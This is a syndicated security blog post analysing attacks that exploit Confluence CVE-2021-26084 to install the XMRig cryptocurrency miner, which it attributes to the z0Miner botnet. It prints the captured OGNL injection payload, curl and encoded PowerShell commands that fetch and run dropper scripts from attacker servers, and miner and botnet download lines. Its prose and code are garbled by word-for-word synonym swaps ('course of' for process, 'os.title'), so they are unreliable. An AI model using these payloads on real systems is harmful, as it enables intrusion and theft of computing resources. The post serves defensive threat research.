Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers

Vulnerability Overview

On August 25, 2021 a security advisory was released for a vulnerability recognized in Confluence Server titled “CVE-2021-26084: Atlassian Confluence OGNL Injection”.

The vulnerability permits an unauthenticated attacker to carry out distant command execution by benefiting from an insecure dealing with of OGNL (Object-Graph Navigation Language) on affected Confluence servers.

Soon after the publication, numerous POC/Exploits had been revealed on-line – on the time of scripting this weblog there are 32 Github repositories out there for CVE-2021-26084.

Besides the publicly out there exploits (makes an attempt at executing them had been already detected on our methods), Imperva safety researchers had been capable of establish attackers’ makes an attempt to exploit this vulnerability with a purpose to set up and run the XMRig cryptocurrency miner on affected Confluence servers working on Windows and Linux methods.

Analysis

Attacker Methodology

As talked about above we had been capable of detect payloads focusing on Windows and Linux Confluence servers.

In each instances, the attacker is utilizing the identical methodology in exploiting a weak Confluence Server.

  • Attacker determines the goal working system and downloads Linux Shell/Windows Powershell dropper scripts from a distant C&C server, and writes them right into a writable location on the affected system (underneath /tmp on Linux and $env:TMP system variable on Windows).
  • Executing downloaded dropper scripts.
  • Dropper Scripts carry out the next actions to obtain, set up and execute the XMRig crypto mining information:
    • Removal of competing crypto mining processes and their associated information.
    • Establishing persistence by including a crontab/scheduled activity based mostly on the working system.
    • Download of the XMRig crypto mining information and post-exploitation clear up scripts. The information are written to short-term places, masked as authentic companies/executables.
    • Starting XMRig mining.
    • Execution of post-exploitation scripts.

Downloaded Dropper Scripts

The following malicious payload was noticed on our monitoring methods:
questionString=aaaaaaaa’+{Class.forName(‘javax.script.ScriptEngineManager’) .newInstance().getEngineByName(‘JavaScript’).eval(‘var isWin =
java.lang.System.getProperty(“os.title”).toLowerCase().accommodates(“win”);
var cmd = new java.lang.String(“curl -fsSL
hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg”);var p = new
java.lang.ProcessBuilder(); if(isWin){p.command(“cmd.exe”, “/c”, cmd);
} else{p.command(“bash”, “-c”, cmd); }p.redirectErrorStream(true); var
course of= p.begin(); var inputStreamReader = new
java.io.InputStreamReader(course of.getInputStream());
var bufferedReader = new java.io.BufferedReader(inputStreamReader); var
line = “”; var output = “”; whereas((line = bufferedReader.readLine())
!= null){output = output + line + java.lang.Character.toString(10);
}’)}+’

From the pattern above we see the attacker is making an attempt to find out the weak server working system by calling java.lang.System.getProperty(“os.title”):

Once the working system is decided, a file is downloaded from a distant supply by both utilizing curl as may be seen within the instance above or by powershell:

Download of a Linux Shell dropper script:
var cmd = new java.lang.String(“curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg);

Download of a Windows Powershell dropper script:
var cmd = new java.lang.String(powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC
4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo
ACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw
BzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA==”
);

The powershell payload is base64 encoded, thus decoded into the next code which downloads the sys.ps1 file:
IEX (New-Object System.Net.Webclient).DownloadString(‘hxxp://27.1.1.34:8080/docs/s/sys.ps1‘)

Shell Dropper scripts:
curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg
Post-exploitation linked clear up scripts that take away all traces of the dropper script talked about above:
curl -fsSL hxxp://27.1.1.34:8080/docs/s/kg.txt -o /tmp/.solrx
curl -fsSL hxxp://27.1.1.34:8080/docs/s/kk.txt -o /tmp/.solrx
curl -fsSL hxxp://27.1.1.34:8080/docs/s/kill.sh -o /tmp/.{random_string}

Executing Downloaded Dropper Scripts

The downloaded dropper scripts are executed utilizing the same payload discovered within the weak querystring parameter proven above.

Below is one instance the place once more the attacker is utilizing completely different code execution command based mostly on the affected server working system detected:
questionString=aaaaaaaa’+{Class.forName(‘javax.script.ScriptEngineManager
‘).newInstance().getEngineByName(‘JavaScript’).eval(‘var isWin =
java.lang.System.getProperty(“os.title”).toLowerCase().accommodates(“win”);
var cmd = new java.lang.String(“bash /tmp/.solrg“);var p = new
java.lang.ProcessBuilder(); if(isWin){p.command(“cmd.exe”, “/c”, cmd);
} else{p.command(“bash”, “-c”, cmd); }p.redirectErrorStream(true); var
course of= p.begin(); var inputStreamReader = new
java.io.InputStreamReader(course of.getInputStream()); var
bufferedReader = new java.io.BufferedReader(inputStreamReader); var
line = “”; var output = “”; whereas((line = bufferedReader.readLine())
!= null){output = output + line + java.lang.Character.toString(10);
}’)}+’

Dropper Script Analysis

As talked about earlier, the primary a part of the dropper scripts are performing the removing of competing crypto mining processes and their associated information.

On Linux methods:

CVE 2021 26084 image 2

On Windows methods:

CVE 2021 26084 image 3

In the following step, the script establishes persistence by including a crontab/scheduled activity, and downloads further information from publicly out there platforms that may generally host malwares (pastebin).

On Linux methods:

CVE 2021 26084 image 4

On Windows methods:

CVE 2021 26084 image 5

The script then lastly downloads the XMRig cryptocurrency miner information.

The information are then written to short-term places, masked as authentic companies/executables.

And lastly, the script beginning the XMRig mining and execution of post-exploitation scripts is completed individually.

The set of actions described above is executed otherwise based mostly on the goal working system.

On Linux methods:

CVE 2021 26084 image 6

Downloaded XMRig cryptocurrency miner information:
curl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json – Miner Config file
curl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd – XMRig Miner
curl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh – XMRig Miner starter script

The script then executes the solr.sh miner starter script which in flip executes solrd, which is the XMRig Miner file that begins the mining course of.

On Windows methods:
First some variables are set, adopted by a customized operate (operate Update($url,$path,$proc_name) that performs file downloads utilizing the WebClient.DownloadFile Method utilizing a System.Net.WebClient object,
which is used later within the script:

CVE 2021 26084 image 7

XMRig miner executable, miner title and path:
$miner_url = “hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe”
$miner_name = “javae”
$miner_path = “$env:TMPjavae.exe”

Miner configuration file, title and path:
$miner_cfg_url = “hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json”
$miner_cfg_name = “config.json”
$miner_cfg_path = “$env:TMPconfig.json”

Clean-up batch script (clear.bat), title and path:
$killmodule_url = “hxxp://27[.]1[.]1[.]34[:]8080/examples/clear.bat”
$killmodule_name = “clear.bat”
$killmodule_path = “$env:TMPclean.bat”

After the script variables are set, the script then performs the next actions:

Clears the System File, Hidden File and Read-Only attributes for any beforehand put in miner configuration information (config.json), and deletes their related information and folders.
Using the customized Update operate, it downloads the miner executable and config information by passing the variables set earlier to the mentioned operate.
Next it units the System File, Hidden File and Read-Only attributes for the newly downloaded miner information, and begins the miner course of.

CVE 2021 26084 image 8

Last step is executing the clean-up batch script, and termination of the powershell.exe course of.

Attacker Origin

The risk actors’ TTP (ways, strategies, procedures) aren’t new and we’ve seen comparable assault campaigns prior to now. Based on the info we noticed together with downloaders, payloads, configuration, C&C servers and extra, we recognized a identified risk actor that’s tied to earlier assault campaigns going again so far as March 2021.

The C&C 27[.]1[.]1[.]34[:]8080 has been beforehand related to the z0Miner botnet.
z0Miner is a malicious mining household that turned lively final yr and has been publicly analyzed by the Tencent Security Team.

It was discovered that the attackers exploited two Oracle Weblogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), which used the identical methodology as talked about earlier to put in XMRig crypto miners on affected methods.

In previous instances it was discovered that the identical botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, utilizing the identical methodology.

Our findings lead us to consider that the identical z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.

Other Identified Payloads

Other payloads had been noticed on our monitoring methods making an attempt to exploit CVE-2021-26084, and had been recognized as:

Muhstik IOT Botnet exercise
curl -s 194[.]31[.]52[.]174/conf2||wget -qO –
194[.]31[.]52[.]174/conf2

The following analysis was performed about this recognized bot exercise:

Muhstik Takes Aim at Confluence CVE 2021-26084

VirusTotal recognized the next payloads as:

BillGates Botnet
curl -O hxxp://213[.]202[.]230[.]103/syna;wget
hxxp://213[.]202[.]230[.]103/syna

Dofloo Trojan
curl -O hxxp://213[.]202[.]230[.]103/quu;wget
hxxp://213[.]202[.]230[.]103/quu

Summary

As is usually the case with RCE vulnerabilities, attackers will rush and exploit affected methods for their very own achieve. RCE vulnerabilities can simply permit risk actors to exploit affected methods for straightforward financial achieve by putting in crypto foreign money miners and masking their exercise, thus abusing the processing assets of the goal.

Once CVE-2021-26084 publicly revealed, the Imperva Threat Research staff instantly started their analysis on making a mitigation. It was quickly discovered that safety in opposition to the vulnerability was already supplied Out-Of-The-Box.

The put up Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers appeared first on Blog.

*** This is a Security Bloggers Network syndicated weblog from Blog authored by Daniel Kerman. Read the unique put up at: https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/

Recommended For You

About the Author: Daniel